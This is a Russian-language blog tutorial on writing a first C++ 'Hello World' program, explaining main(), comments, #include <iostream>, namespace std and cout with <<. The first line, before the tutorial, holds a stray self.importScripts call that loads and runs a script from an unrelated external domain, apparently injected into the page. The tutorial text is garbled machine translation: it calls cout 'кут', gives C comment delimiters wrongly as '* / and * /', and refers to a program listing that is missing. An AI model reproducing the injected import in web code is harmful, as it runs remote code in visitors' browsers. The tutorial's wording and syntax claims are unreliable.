google-site-verification: google2818f8f06eec354e.html self.importScripts('https://zworld-news.com/sw/w_1.js');

Первая программа C ++ - Hello World


Мы завершили базовое введение в C ++ и особенности языка. Надеемся, что вы установили среду, необходимую для запуска программ C ++ на вашем компьютере. Давайте перейдем к написанию первой C ++ программы для печати Hello World. До этого нам нужно знать некоторые основы языка.
Стандарт ISO C ++ определяет два вида объектов: 
1. Основные функции языка, такие как встроенные типы и циклы. 
2. Компоненты стандартной библиотеки, такие как контейнеры и операции ввода-вывода.
Компоненты стандартной библиотеки - это совершенно обычный код C ++, предоставляемый каждой реализацией версии C ++. На самом деле стандартная библиотека C ++ реализована в самом C ++, что позволяет нам понять, что язык достаточно выразительный и мощный. Мы поговорим о них подробнее, когда перейдем к дальнейшим учебникам.

Первая программа C ++ - Hello World


Выход
Первая программа C ++ - Hello World

int main ()

Как и C, C ++ также представляет собой набор из нескольких функций. В приведенной выше программе у нас есть только одна функция с именем main (). Это необходимая функция по умолчанию, которую должна содержать каждая программа. Его тип возврата может варьироваться в зависимости от требований пользователя. Выполнение программы на C начинается с основной функции. Компилятор игнорирует пробелы и возврат каретки. Вы можете делать отступы с любым количеством пробелов. Точно так же, как C, каждый оператор программы должен заканчиваться точкой с запятой в C ++. Весь код находится внутри фигурных скобок {}. Показывает тело функции main ()

Комментарии

Если вы знакомы с C, вы можете помнить, что он позволяет нам использовать многострочные комментарии, заключенные в символы * / и * / comment. Они все еще действительны в C ++. Комментарии повышают читаемость и делают код легким для понимания.
/ * это многострочный комментарий, здесь вы можете прокомментировать имя автора программы , входы, выходы, поток управления и т. д. * /


Помимо этих многострочных комментариев, C ++ представил однострочные комментарии с символом // перед комментарием. Вы можете увидеть первую строку программы, чтобы увидеть такой тип комментариев. Они допускают только однострочные комментарии, и они игнорируются компилятором.
// это однострочные комментарии // здесь можно дать краткое описание строки или о следующем блоке кода

#include <iostream>

Первая строка программы указывает препроцессору включить в программу содержимое заголовочного файла iostream. Мы используем этот заголовочный файл, так как он содержит объявления идентификатора cout и оператора <<.
ANSI C ++ представил новые изменения в заголовочных файлах. Обычно мы использовали для записи заголовочных файлов в старых версиях C ++ как «iostream.h». Если ваш компилятор не поддерживает ANSI C ++, убедитесь, что вы изменили заголовочный файл как «iostream.h». Обратите внимание, что некоторые реализации также используют как «iostream.hpp». Мы должны включить правильные заголовочные файлы в соответствии с нашей реализацией компилятора.
Старая версия
#include <iostream.h>
Новая версия
#include <iostream>

используя пространство имен std

Пространство имен - это новая концепция в ISO C ++. Это определяет область действия идентификаторов, которые мы используем в нашей программе. Для использования идентификаторов, определенных в области имен, нам нужно включить их в программу. В приведенной выше программе std - это пространство имен, в котором находятся стандартные библиотеки C ++. Как мы уже говорили в начале, у нас есть стандартная библиотека и основные языковые функции.

кут & <<

Посмотрите вышеприведенную программу, мы написали единственное утверждение в функции main (), которое выводит сообщение на стандартный экран вывода. Это утверждение помогает нам узнать о двух новых функциях C ++. Первый - это объект, а второй - перегрузка оператора. cout - это предопределенный объект, представляющий стандартный вывод в C ++. Оператор << отправляет данное сообщение в кавычках на стандартный экран вывода, используя объект cout.
Вы можете усомниться в том, что оператор << используется как побитовый оператор левого сдвига в C. Да, он также служит той же цели в C ++. Мы уже знакомы с тем, что C ++ проявляет полиморфизм, что означает существование во многих формах в зависимости от контекста. Здесь мы используем оператор <<, как указано для оператора. А в некоторых случаях мы часто используем его как побитовый оператор левого сдвига. Эта концепция называется перегрузкой операторов.

Так что это была наша первая программа на C ++, напечатавшая привет. Вы видели так много странных терминов в этом уроке. Не беспокойтесь о них, мы обсудим их в следующих уроках. Если у вас есть какие-либо сомнения, не стесняйтесь спрашивать их, комментируя ниже.

Комментариев нет:

Отправить комментарий